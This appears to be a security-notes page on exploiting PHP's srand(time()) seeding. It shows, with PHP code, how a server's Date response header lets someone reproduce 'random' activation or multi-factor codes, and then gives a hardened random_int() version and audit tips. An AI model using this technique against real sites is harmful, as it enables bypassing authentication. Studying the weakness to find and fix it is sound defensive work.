Exploit Notes

PHP Srand Time Abusing

Last modified: 2023-03-09


If a website seeds PHP's random number generator with “srand(time())” before generating random strings, the output is not random at all: the seed is the current Unix timestamp, which we can reconstruct and pass as the argument of “srand()” ourselves to reproduce the same values.


function generate_random_number() {
	// Some code for generating random number...
	srand(time());              // seeded with the current Unix timestamp (one-second granularity)
	$random_numbers = rand();   // every rand() call after the seed is fully determined by it
	return $random_numbers;
}

For example, assume a website uses the above function to generate random numbers or strings for authentication purposes, such as an activation code or a multi-factor security code.
In such cases, we can replace the “time()” call with “strtotime()” applied to the server's own timestamp, which makes the result reproducible.


1. Send Request

First off, send the request that triggers the desired function, e.g. “generate_random_number”, which calls “srand(time())”.
Then look at the Date header in the HTTP response.

Date: Thu, 09 Mar 2023 08:31:35 GMT

This gives the server's clock at the moment of the request, e.g. “08:31:35”, so copy the whole Date value.

2. Generate Non-Random Result

We can pass the above Date value as the argument of the “strtotime()” function, in place of “time()”, as follows.

function generate_random_number() {
    // Some code for generating random number...
    srand(strtotime("Thu, 09 Mar 2023 08:31:35 GMT")); // the Date header value replaces time()
    $random_numbers = rand();
    echo $random_numbers;
}

Now execute the above function in a PHP playground.
It produces the same result no matter how many times we run it, because the seed is now a fixed timestamp instead of the current time.
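The following is an added example, not code from the original page: it puts the weak time-seeded generator described in the two steps above next to a hardened version, so the difference can be checked in one run. The function names (weak_activation_code, strong_activation_code) and the six-digit code format are assumptions; the Date header value is the one quoted on this page, and the resulting seed 1678350695 is that timestamp as Unix time.

```php
<?php
// Added example (not from the original page). Shows why srand(time()) is
// predictable and what a fixed generator looks like.

// Weak: the seed is the request time, which a client can infer from the
// response's Date header. Since PHP 7.1, srand()/rand() are aliases of
// mt_srand()/mt_rand(), so the output is a deterministic function of the seed.
function weak_activation_code(int $seed): string {
    mt_srand($seed);
    return sprintf('%06d', mt_rand(0, 999999));   // assumed six-digit code format
}

// Hardened: random_int() draws from the OS CSPRNG and takes no seed,
// so there is nothing for a client to reconstruct.
function strong_activation_code(): string {
    return sprintf('%06d', random_int(0, 999999));
}

// Date header value quoted on this page; "GMT" in the string makes the
// parse independent of the script's default timezone.
$dateHeader = 'Thu, 09 Mar 2023 08:31:35 GMT';
$seed = strtotime($dateHeader);                    // 1678350695

// Same seed, same "random" code, every time: this is the weakness.
$first  = weak_activation_code($seed);
$second = weak_activation_code($seed);
printf("weak:   %s %s  identical=%s\n", $first, $second, var_export($first === $second, true));

// The hardened generator gives independent values on each call.
$c1 = strong_activation_code();
$c2 = strong_activation_code();
printf("strong: %s %s  identical=%s\n", $c1, $c2, var_export($c1 === $c2, true));
```

When auditing a code base for this issue, look for any `srand()` or `mt_srand()` call whose argument is derived from `time()`, `microtime()` or another client-observable value, and for `rand()`, `mt_rand()`, `shuffle()` or `str_shuffle()` feeding security tokens; `random_int()` and `random_bytes()` are the drop-in fixes. Note that time() has one-second granularity, so every request handled within the same second shares the seed, which is why the header value alone is enough to reproduce the output.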
